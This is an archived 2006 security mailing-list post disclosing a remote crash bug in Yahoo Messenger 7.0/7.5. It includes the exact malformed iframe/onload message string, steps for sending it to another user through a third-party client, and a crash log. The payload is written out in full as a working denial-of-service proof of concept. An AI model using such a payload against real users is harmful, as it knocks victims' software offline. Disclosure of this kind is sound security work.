Information Security


Additional information

  DoS against Yahoo Messenger

  Yahoo messenger bug

From: Ivan Ivan <ivancool2003_(at)_yahoo.com.ar>
Date: June 22, 2006
Subject: Yahoo messenger bug

Hi,
I found a vulnerability in Yahoo Messenger: if you receive a private message with
this string "msg:---------------------------------------------iframe onload=$InlineAction()>:)"
(without quotes), Yahoo Messenger will crash with a runtime error.
 Remote crash proof of concept:
 1. Open Messenger and log in.
 2. Open a third-party Yahoo chat client like YahElite version 269 through the Ymsgr
protocol and log in with another account.
 3. Send a PM to the Messenger account with this string:
"s: msg :---------------------------------------------iframe onload=$InlineAction()>:)"
(without quotes)
 4. The remote user will crash, closing down her messenger.
 Note: "msg :" this space must be created with alt+0160.
 s:(space)msg(alt+0160):---------------------------------------------iframe onload=$InlineAction()>:)
 
Tested in Yahoo Messenger 7.0/7.5.
I didn't try it in Yahoo Messenger 8.0 Beta yet.
This is the event log:
0000: 41 70 70 6c 69 63 61 74   Applicat
0008: 69 6f 6e 20 46 61 69 6c   ion Fail
0010: 75 72 65 20 20 79 70 61   ure  ypa
0018: 67 65 72 2e 65 78 65 20   ger.exe
0020: 37 2e 30 2e 30 2e 34 33   7.0.0.43
0028: 38 20 69 6e 20 6a 73 63   8 in jsc
0030: 72 69 70 74 2e 64 6c 6c   ript.dll
0038: 20 35 2e 36 2e 30 2e 38    5.6.0.8
0040: 38 33 31 20 61 74 20 6f   831 at o
0048: 66 66 73 65 74 20 30 30   ffset 00
0050: 30 31 36 38 39 31 0d 0a   016891..
I have installed the latest version of jscript.dll but the problem continues.
So do you have any information about this issue?
I discovered that it's a vulnerability exploited in the wild since February but I don't
have enough information.
 Regards

               

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod